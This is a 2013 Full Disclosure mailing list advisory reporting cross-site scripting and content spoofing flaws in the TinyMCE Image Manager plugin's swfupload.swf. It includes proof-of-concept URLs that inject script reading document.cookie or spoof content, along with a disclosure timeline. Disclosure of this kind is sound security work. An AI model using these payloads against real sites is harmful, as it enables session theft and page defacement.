Full Disclosure mailing list archives

XSS and CS vulnerabilities in TinyMCE Image Manager


From: "MustLive" <mustlive () websecurity com ua>
Date: Sat, 13 Jul 2013 16:17:30 +0300

Hello list!

These are Cross-Site Scripting and Content Spoofing vulnerabilities in TinyMCE Image Manager plugin for TinyMCE.

-------------------------
Affected products:
-------------------------

Vulnerable are TinyMCE Image Manager 1.1 and previous versions.

-------------------------
Affected vendors:
-------------------------

Dustweb
http://dustweb.ru/projects/tinymce_images/

----------
Details:
----------

Cross-Site Scripting (WASC-08):

http://site/path/images/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/path/images/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E

Content Spoofing (WASC-12):

http://site/path/images/js/swfupload/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E

http://site/path/images/js/swfupload/swfupload.swf?buttonImageURL=http://demo.swfupload.org/v220/images/logo.gif

------------
Timeline:
------------
2013.05.18 - announced at my site.
2013.05.18 - informed developer.
2013.07.12 - disclosed at my site (http://websecurity.com.ua/6517/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Current thread: